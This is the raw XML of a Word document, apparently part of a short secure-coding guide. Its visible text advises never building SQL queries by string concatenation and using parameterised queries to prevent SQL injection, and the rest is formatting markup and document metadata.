    <w:p w14:paraId="5FDBF010" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:t>Never build SQL queries with string concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395719A" w14:textId="77777777" w:rsidR="006A0918" w:rsidRPr="006A0918" w:rsidRDefault="006A0918" w:rsidP="006A0918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A0918">
        <w:t>parameterised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A0918">
        <w:t xml:space="preserve"> queries (prepared statements) to prevent SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA26101" w14:textId="77777777" w:rsidR="00214B6A" w:rsidRDefault="00214B6A"/>
    <w:sectPr w:rsidR="00214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B4646"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DC8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E1618D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A7C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7F105A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBCC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6415974">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1325551889">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1124499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18"/>
    <w:rsid w:val="00214B6A"/>
    <w:rsid w:val="003A7A81"/>
    <w:rsid w:val="004A148D"/>
    <w:rsid w:val="006A0918"/>
    <w:rsid w:val="0074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9F950B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1C8F2D1C-E5DE-4F84-84FC-5195C23C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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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9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476</Words>
  <Characters>2556</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>65</Lines>
  <Paragraphs>52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Sakina Kerubo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sakina Kerubo</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-28T15:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-28T15:13:00Z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a280427a-d26f-459e-aae3-402b0aa64287</vt:lpwstr>
  </property>
</Properties>
</file>